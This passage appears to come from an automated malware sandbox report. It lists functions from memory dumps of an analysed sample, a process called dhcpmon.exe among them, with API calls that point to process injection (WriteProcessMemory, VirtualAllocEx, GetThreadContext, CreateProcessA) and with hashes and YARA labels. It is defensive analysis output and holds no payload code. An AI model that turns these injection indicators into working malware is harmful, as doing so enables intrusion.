Instruction Fuzzy Hash: 9DA16770B012188FCF24EFB9D8546AEBBF6AF85354F148429D406EB3A4DB348C01DB81

Uniqueness

Uniqueness Score: -1.00%

Function 02DEDAA4, Relevance: 1.8, APIs: 1, Instructions: 325processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02DEDD77

Memory Dump Source

Source File: 0000000C.00000002.334630957.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 473701c7323333d7f4da423d6036e74cca9a90822fec5cf55f24f77b0d78fdda
Instruction ID: 423fe1231fcc43e0412015a1fed5f2b124da539e5314e9f5277132c3ff8ead26
Opcode Fuzzy Hash: 473701c7323333d7f4da423d6036e74cca9a90822fec5cf55f24f77b0d78fdda
Instruction Fuzzy Hash: 47C11471D002298FDF24DFA4C884BEDBBB6BF49304F0095A9D85AB7240DB749A85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02DEDAB0, Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02DEDD77

Memory Dump Source

Source File: 0000000C.00000002.334630957.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b6a672e812c9106cb79f96ff31af44045a1c35a35f6db320144044b95dba1a84
Instruction ID: 39d6353921eac823e6259deb9eabd9e438fa8f6ead46a781ac1fe67d6a829f98
Opcode Fuzzy Hash: b6a672e812c9106cb79f96ff31af44045a1c35a35f6db320144044b95dba1a84
Instruction Fuzzy Hash: F5C11471D002298FDF24DFA4C884BEDBBB6BF49304F0095A9D85AB7240DB749A85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02DED722, Relevance: 1.6, APIs: 1, Instructions: 117injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02DED7FB

Memory Dump Source

Source File: 0000000C.00000002.334630957.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 758ac3c18016571c92f570a6f2437e53c7383e64f40546df5c421836447c18bc
Instruction ID: a1fe23f09d0d24dae6ae853b319b03cea1da91082d78685a44432f0912259787
Opcode Fuzzy Hash: 758ac3c18016571c92f570a6f2437e53c7383e64f40546df5c421836447c18bc
Instruction Fuzzy Hash: E241A9B4D012589FCF00DFA9D984AEEBBF5BB49314F14942AE815B7200D734AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 02DED728, Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02DED7FB

Memory Dump Source

Source File: 0000000C.00000002.334630957.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b731b0a22bcac5b48d348ecbffb768fcdd78fe311e0184217437267d4465f41e
Instruction ID: 5aee86ef22b00a2b012ed6d6c95f474c9a485704d0bd620388f5ea028a318df5
Opcode Fuzzy Hash: b731b0a22bcac5b48d348ecbffb768fcdd78fe311e0184217437267d4465f41e
Instruction Fuzzy Hash: B041A9B4D012589FCF00DFA9D984AEEBBF5BB49314F14942AE819B7200D734AA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DED878, Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02DED932

Memory Dump Source

Source File: 0000000C.00000002.334630957.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e0a4a840cb26f546d1e0ce67e88310c9f184eeb970c5ae5cec7e8e70122b04b6
Instruction ID: dbc3241afc8b24f950119e55e2161cc77f8fd86556160cc06fe8f2ad5da3fced
Opcode Fuzzy Hash: e0a4a840cb26f546d1e0ce67e88310c9f184eeb970c5ae5cec7e8e70122b04b6
Instruction Fuzzy Hash: 094198B9D002589FCF10CFA9D884AEEFBB5BB19324F14942AE815B7200D735A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DED880, Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02DED932

Memory Dump Source

Source File: 0000000C.00000002.334630957.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: dc5af40577089224b98bc18570d162c0be2388d6a76e1a4c5c0a2d8b16a985f3
Instruction ID: 552ac3363a4fc21b08de48883714bd02005df3bbe54ba16e028e574e50e78381
Opcode Fuzzy Hash: dc5af40577089224b98bc18570d162c0be2388d6a76e1a4c5c0a2d8b16a985f3
Instruction Fuzzy Hash: 2F4188B9D002589FCF10CFAAD884AEEFBB5BB59324F14942AE815B7200D735A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 02DED600, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02DED6B2

Memory Dump Source

Source File: 0000000C.00000002.334630957.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bd8baa87c9da0b81884150cd87b4ddcfbd57a059aa60cbc170daf3622585752e
Instruction ID: 32a3a356231876df8f2e7a85ef84b27e21b996422817efdad4987f3de7a7d0c2
Opcode Fuzzy Hash: bd8baa87c9da0b81884150cd87b4ddcfbd57a059aa60cbc170daf3622585752e
Instruction Fuzzy Hash: DC31A8B9D002589FCF10DFA9D984AEEBBB5BF09314F10942AE815B7310D734A946CF64

Uniqueness

Uniqueness Score: -1.00%

Function 02DEC9E0, Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SetKernelObjectSecurity.KERNELBASE(?,?,?), ref: 02DECAA4

Memory Dump Source

Source File: 0000000C.00000002.334630957.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: KernelObjectSecurity
String ID:
API String ID: 3015937269-0
Opcode ID: 21a565452ab99e1ebb461d1a19846d147a6dcc369864fd04a6636e7a43330e34
Instruction ID: d1aee0b0a600a5af81620efdc270454979079ca92d3c57bbd971a9a25f17ce52
Opcode Fuzzy Hash: 21a565452ab99e1ebb461d1a19846d147a6dcc369864fd04a6636e7a43330e34
Instruction Fuzzy Hash: 094187B5D042589FCF10CFA9D984AEEBBF1BB49314F24902AE819B7310D374A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 02DEBD7C, Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SetKernelObjectSecurity.KERNELBASE(?,?,?), ref: 02DECAA4

Memory Dump Source

Source File: 0000000C.00000002.334630957.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: KernelObjectSecurity
String ID:
API String ID: 3015937269-0
Opcode ID: 114931287d562b7dd3fae6ffc09bf58dfd6cbd2522ce363eadab4b9664fee657
Instruction ID: 584626d5ba924acb2c8d781127f3bb9fb04eb7ea9f2841c5fced7e8e50010aed
Opcode Fuzzy Hash: 114931287d562b7dd3fae6ffc09bf58dfd6cbd2522ce363eadab4b9664fee657
Instruction Fuzzy Hash: FF4197B4D042589FCB10CFA9D984AEEBBF5BB49314F14802AE819B7310D374AA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DED608, Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02DED6B2

Memory Dump Source

Source File: 0000000C.00000002.334630957.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 695aa5d4ae7cf64f8d671dc9ad82df5c8085aac03425474340a178f4df09b56f
Instruction ID: 6169a416f568ddc03094ef193b4d3b3209981622af7206334698d8a262475f00
Opcode Fuzzy Hash: 695aa5d4ae7cf64f8d671dc9ad82df5c8085aac03425474340a178f4df09b56f
Instruction Fuzzy Hash: F03187B9D002589FCF10DFA9D980AEEBBB5BB49314F10942AE815B7310D735A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DEDF48, Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02DEE8F6

Memory Dump Source

Source File: 0000000C.00000002.334630957.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3631937bbff9524716c0a312b98d4a8b802f87205851b0df80ca16870f843831
Instruction ID: 2e471b823474abe13fe468bd57d25d68f649ca51f672e4049957da33ebf075f2
Opcode Fuzzy Hash: 3631937bbff9524716c0a312b98d4a8b802f87205851b0df80ca16870f843831
Instruction Fuzzy Hash: A33177B8D002589FCF10CFA9D984ADEFBB4BB09320F10942AE815B7310D774A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DEE84A, Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02DEE8F6

Memory Dump Source

Source File: 0000000C.00000002.334630957.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 965eca0410f0763c2cb92850e43a68579f5d5b4612e5a43f36b13dd25835cdec
Instruction ID: c658e3374a52d76c4c72a3af1dc6939ad8707e3f4f7641a30d8a9320a2bceb34
Opcode Fuzzy Hash: 965eca0410f0763c2cb92850e43a68579f5d5b4612e5a43f36b13dd25835cdec
Instruction Fuzzy Hash: B73165B9D002589FCF10CFA9D984ADEFBB5BB09324F14942AE819B7310D734A946CF64

Uniqueness

Uniqueness Score: -1.00%

Function 02DE9960, Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02DE9A0F

Memory Dump Source

Source File: 0000000C.00000002.334630957.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 76f960b04b6ced7c9036fde195f44d0ec310ebcf5d5846ebc272dd2867654271
Instruction ID: 2be1a4e5e7aab48627f9a07f3887799a47a7e518ce9161b8aba5e188a2dfbd00
Opcode Fuzzy Hash: 76f960b04b6ced7c9036fde195f44d0ec310ebcf5d5846ebc272dd2867654271
Instruction Fuzzy Hash: 653187B9D052589FCF10CFA9E584AEEFBB1AF19314F14902AE819B7310D374A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 02DED0D8, Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

GetThreadContext.KERNELBASE(?,?), ref: 02DED187

Memory Dump Source

Source File: 0000000C.00000002.334630957.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: cb88316cc03d3188df33cf0eb2ec5dbb02068a883378ede3dca25270a9336d55
Instruction ID: 809349bad02f94c746bc9a405874bbc8fdbe24cbc89844c53d23b7d0782e8069
Opcode Fuzzy Hash: cb88316cc03d3188df33cf0eb2ec5dbb02068a883378ede3dca25270a9336d55
Instruction Fuzzy Hash: 9F31A9B4D002589FCF10DFA9D884AEEBBF5AF49314F24842AE415B7340D738A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02DED0D1, Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

GetThreadContext.KERNELBASE(?,?), ref: 02DED187

Memory Dump Source

Source File: 0000000C.00000002.334630957.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 3b9acf71241b64ecf9b16bebd066952b285bf695da1627207814428e1bbd4093
Instruction ID: e69b5042d492708a66db01166affc9253276cc18ce2d55a0512818f99e91e218
Opcode Fuzzy Hash: 3b9acf71241b64ecf9b16bebd066952b285bf695da1627207814428e1bbd4093
Instruction Fuzzy Hash: 7C41C9B5D002589FCF10DFA9D884AEEBBB5BF49314F24842AE415B7300D738A949CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02DE9968, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02DE9A0F

Memory Dump Source

Source File: 0000000C.00000002.334630957.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7084065300fa304a31d23335a5a604913309e668462b252acfd2d23eee127f2e
Instruction ID: 44e1f0bb7048d807a736e0772f4914b261ead53dddc520c1c0bbfb611f640854
Opcode Fuzzy Hash: 7084065300fa304a31d23335a5a604913309e668462b252acfd2d23eee127f2e
Instruction Fuzzy Hash: EA3186B9D052589FCF10CFA9E884AEEFBB4AF09310F14902AE815B7310D774A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0121D4A0, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.334370889.000000000121D000.00000040.00000001.sdmp, Offset: 0121D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d01c129004676200e0b6ef51143da050c8ca237c35ef8dfe9592a137198fbdc
Instruction ID: f11c46fb424eeac524bd3f6db09774dee6838e2ab6232f1ce0e3e1e99cfdbcfb
Opcode Fuzzy Hash: 8d01c129004676200e0b6ef51143da050c8ca237c35ef8dfe9592a137198fbdc
Instruction Fuzzy Hash: EC2148B1514248EFDB11CF94E8C8B67BFA5FB94328F208569E9050B20AC336E815CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0121D3B4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.334370889.000000000121D000.00000040.00000001.sdmp, Offset: 0121D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb03d040f1f4f47e7eaea53e18e9fefff7f6f89996669b00ed5bfe155f9865a6
Instruction ID: 8733e1c2f95a120bf7924524c69b2ccbfeb4fb75ed9985bb7dace48f87660466
Opcode Fuzzy Hash: cb03d040f1f4f47e7eaea53e18e9fefff7f6f89996669b00ed5bfe155f9865a6
Instruction Fuzzy Hash: 0D2148B1554248DFCB05CF94D8C8FA6BBA5FB94324F20C569E9050B20AC336E456CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0121D3AF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.334370889.000000000121D000.00000040.00000001.sdmp, Offset: 0121D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a26b7e00566609b61cc6e7b6904e6af9279d8b55cc0f39cc8370a306dd16ad
Instruction ID: 3d25cde42f6b31b75533f1c4c872fe428855f477f1f8e11075c1486f14bba848
Opcode Fuzzy Hash: 67a26b7e00566609b61cc6e7b6904e6af9279d8b55cc0f39cc8370a306dd16ad
Instruction Fuzzy Hash: B511E1B6444284CFCB02CF54D5C4B56BFB1FB94324F24C6A9D9440B61AC33AE45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0121D49B, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.334370889.000000000121D000.00000040.00000001.sdmp, Offset: 0121D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a26b7e00566609b61cc6e7b6904e6af9279d8b55cc0f39cc8370a306dd16ad
Instruction ID: b32483f23f319347649e7979c2bbbbebeaf4c734b0d65a94e9de1e7c82a25ed0
Opcode Fuzzy Hash: 67a26b7e00566609b61cc6e7b6904e6af9279d8b55cc0f39cc8370a306dd16ad
Instruction Fuzzy Hash: 6F11B1B6404284DFDB12CF58D5C4B16BFB1FB94324F2486A9D9050B65BC33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: dhcpmon.exe PID: 6048 Parent PID: 6428 dhcpmon.exeCOMMON

Executed Functions

Function 0306B6C0, Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0306B730
GetCurrentThread.KERNEL32 ref: 0306B76D
GetCurrentProcess.KERNEL32 ref: 0306B7AA
GetCurrentThreadId.KERNEL32 ref: 0306B803

Memory Dump Source

Source File: 00000012.00000002.352665704.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: f514c805b6462c3bfd7de9daac059c23cf01a3366ea424c00aec3a2bf7db46d0
Instruction ID: 53863f76c16ceb860f420a75eda4e132d32675fdf01501bf342b5cc6f5822f8b
Opcode Fuzzy Hash: f514c805b6462c3bfd7de9daac059c23cf01a3366ea424c00aec3a2bf7db46d0
Instruction Fuzzy Hash: 2E5163B49012498FDB10CFAAC588BEEBBF0FF48314F248969E449A7350DB349944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0306B6D0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0306B730
GetCurrentThread.KERNEL32 ref: 0306B76D
GetCurrentProcess.KERNEL32 ref: 0306B7AA
GetCurrentThreadId.KERNEL32 ref: 0306B803

Memory Dump Source

Source File: 00000012.00000002.352665704.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 201599ce5b1f60069bd9b42b40ea986556745d24ff3f0c22dfa5dc81acede8ad
Instruction ID: 80f418f84b619086c4277a18ba8e573871983ecc14f13dea86fcb1d1f1e52161
Opcode Fuzzy Hash: 201599ce5b1f60069bd9b42b40ea986556745d24ff3f0c22dfa5dc81acede8ad
Instruction Fuzzy Hash: 9B5163B49013498FDB10CFAAC588BEEBBF1BF48314F248969E459A7350CB749944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 030693E8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0306962E

Memory Dump Source

Source File: 00000012.00000002.352665704.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 260c1f53df284e4dea7ebaa65aa646726d43904dd28e6916c5e5875dceab02ae
Instruction ID: 9d48fb77104c5d41bf64211d4ca9e855c9fd4bf33b510085ef29d6dccd31b584
Opcode Fuzzy Hash: 260c1f53df284e4dea7ebaa65aa646726d43904dd28e6916c5e5875dceab02ae
Instruction Fuzzy Hash: CA714470A01B058FD764CF6AC055B9ABBF5FF88214F048A2ED48ADBA44DB34E845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0306FB20, Relevance: 1.7, APIs: 1, Instructions: 178COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0306FD0A

Memory Dump Source

Source File: 00000012.00000002.352665704.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 77d15a55dd65f8df2d22916c37c19a4f076772bd47a006186916e7f35f6c8e93
Instruction ID: df74e08547cd0fc6429b840d0c226186efefc646573dc5eb794448ed2f80558e
Opcode Fuzzy Hash: 77d15a55dd65f8df2d22916c37c19a4f076772bd47a006186916e7f35f6c8e93
Instruction Fuzzy Hash: 416157B1C053899FCF11CFA9D881ACDBFB1BF49310F18816AE814AB256D734A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0306FB98, Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0306FD0A

Memory Dump Source

Source File: 00000012.00000002.352665704.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: d4406ca157f2d4b872c97f29fb2e7bfc04889a8779f6a66ab64cffd5df4f67ef
Instruction ID: eef8857905e11d9522d74415d3fb168a43f0af9766c91e25ed847674200ab172
Opcode Fuzzy Hash: d4406ca157f2d4b872c97f29fb2e7bfc04889a8779f6a66ab64cffd5df4f67ef
Instruction Fuzzy Hash: 5C5114B1C04249AFCF11CFA9D980ACDBFB2FF49314F18816AE818AB225D7719955CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0306FBF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0306FD0A

Memory Dump Source

Source File: 00000012.00000002.352665704.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 1111125b683ece8919243f312881f2f7255c831b21a1b876bcd294da33921694
Instruction ID: a4d1baaaaee661433a081c1e53684bdfb94a7433e6c3c6c8d4d1c7a49bb0eaeb
Opcode Fuzzy Hash: 1111125b683ece8919243f312881f2f7255c831b21a1b876bcd294da33921694
Instruction Fuzzy Hash: 9341DEB1D003099FDF14CFA9D884ADEBBB6BF48314F24852AE819AB214D774A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0306BD00, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0306BD87

Memory Dump Source

Source File: 00000012.00000002.352665704.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1b406b58d6a8b22666845bcace4b38f2b8257bf02d722d6c807e473440498ab1
Instruction ID: 11f7f6aaddb811e3ffa80a0bb39cfeea26f064bbb269bf5d00b7a28e1cca9939
Opcode Fuzzy Hash: 1b406b58d6a8b22666845bcace4b38f2b8257bf02d722d6c807e473440498ab1
Instruction Fuzzy Hash: 6521C4B59012589FDB10CFAAD884ADEBBF8FF48324F14841AE954A7311D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0306BCF9, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0306BD87

Memory Dump Source

Source File: 00000012.00000002.352665704.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6d915487c3f92a8f198d2b682af631284b9774d39f7f991513f46e4e385d67b1
Instruction ID: 1b2c213d84da803fe9005819ea0c5f8e1bf0c432b8dfd842e2c163d64c619331
Opcode Fuzzy Hash: 6d915487c3f92a8f198d2b682af631284b9774d39f7f991513f46e4e385d67b1
Instruction Fuzzy Hash: 6421E2B59002499FDB10CFA9D584ADEFBF4BF48324F14841AE858A7311C378AA54CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 03068768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030696A9,00000800,00000000,00000000), ref: 030698BA

Memory Dump Source

Source File: 00000012.00000002.352665704.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9c4c31e33859b2e2b4a658eb798839074374333d26c311223cc5623668b0ad97
Instruction ID: a738755586ecc6e1eb055180b29f1764780b03379bd8242730e0e5047ae37cb5
Opcode Fuzzy Hash: 9c4c31e33859b2e2b4a658eb798839074374333d26c311223cc5623668b0ad97
Instruction Fuzzy Hash: 0211D3B6D002499FDB10CF9AC444AEEFBF4EB48324F14842AE955A7600C775A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 03069849, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030696A9,00000800,00000000,00000000), ref: 030698BA

Memory Dump Source

Source File: 00000012.00000002.352665704.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4eeef7bcb880c5a9a612320d7c7d9abe82c6fbc3a7c28adee4fc54af557bdfb9
Instruction ID: 4b36030f9d1d25d3091ae7f3a0038b33141adad80102e63a7f4983ea977e8b41
Opcode Fuzzy Hash: 4eeef7bcb880c5a9a612320d7c7d9abe82c6fbc3a7c28adee4fc54af557bdfb9
Instruction Fuzzy Hash: 7D11E2B6D002499FDB10CF9AC844ADEFBF8EF48324F14842AE455A7700C374A645CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 030695C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0306962E

Memory Dump Source

Source File: 00000012.00000002.352665704.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 36a8c68b8522960473727ab202d8853b049de65f880e6c854546786cfd7d6dcf
Instruction ID: 4f8f79863d54297b8fa22cd6a156017531978aa927e4c589594416a9b91336f1
Opcode Fuzzy Hash: 36a8c68b8522960473727ab202d8853b049de65f880e6c854546786cfd7d6dcf
Instruction Fuzzy Hash: 0811E0B5D007498FDB10CF9AC444BDEFBF4AF89224F14842AD859A7600C374A645CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0306FE38, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0306FE9D

Memory Dump Source

Source File: 00000012.00000002.352665704.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: aefecd18dfb700995dc012f7b156d6357d83d1cec9462181500ba88fafd93801
Instruction ID: 0ce65440c2ef8d8b2719c5c384806dc62c24ab12a8f1b5a23b8619889ecbe22c
Opcode Fuzzy Hash: aefecd18dfb700995dc012f7b156d6357d83d1cec9462181500ba88fafd93801
Instruction Fuzzy Hash: 9E1115B59002499FDB10CF99D589BDEFBF8EB48324F14841AE854B7300C374AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0306FE40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0306FE9D

Memory Dump Source

Source File: 00000012.00000002.352665704.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 010af9ae362cfe2481588cb4eb98a09180516e21788d80ccea5e05bd56f0cfb8
Instruction ID: 152eacdc955b53a10fbf687eda3500aa94b8057e7e474b9fac2431046276fc5a
Opcode Fuzzy Hash: 010af9ae362cfe2481588cb4eb98a09180516e21788d80ccea5e05bd56f0cfb8
Instruction Fuzzy Hash: 9411E2B59002499FDB10CF9AD589BDEFBF8EB48324F14841AE955A7340C374AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0151D4A0, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.351652298.000000000151D000.00000040.00000001.sdmp, Offset: 0151D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 663cfbf24da40d1c38d1ea0fc87269cfd1d20acc4dcf2010079a8a80b6de4bfc
Instruction ID: 2895f29cf7f3bc9ee72d2a64e37b5db4a678dc32f8b66e7c518c5f7001783355
Opcode Fuzzy Hash: 663cfbf24da40d1c38d1ea0fc87269cfd1d20acc4dcf2010079a8a80b6de4bfc
Instruction Fuzzy Hash: A0212B71504240DFEB06DF94D8C8F6ABFB5FB84318F248969E9050F20AC376D855C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0152D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.351802371.000000000152D000.00000040.00000001.sdmp, Offset: 0152D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f3ccec50282003afb128d27d12de20f980b29c5a205755a490817c824824b3
Instruction ID: 69fe319a0b9cf6fc1252dcfa928939b23d00df28552d4b7df1ada10b0a598f8b
Opcode Fuzzy Hash: 41f3ccec50282003afb128d27d12de20f980b29c5a205755a490817c824824b3
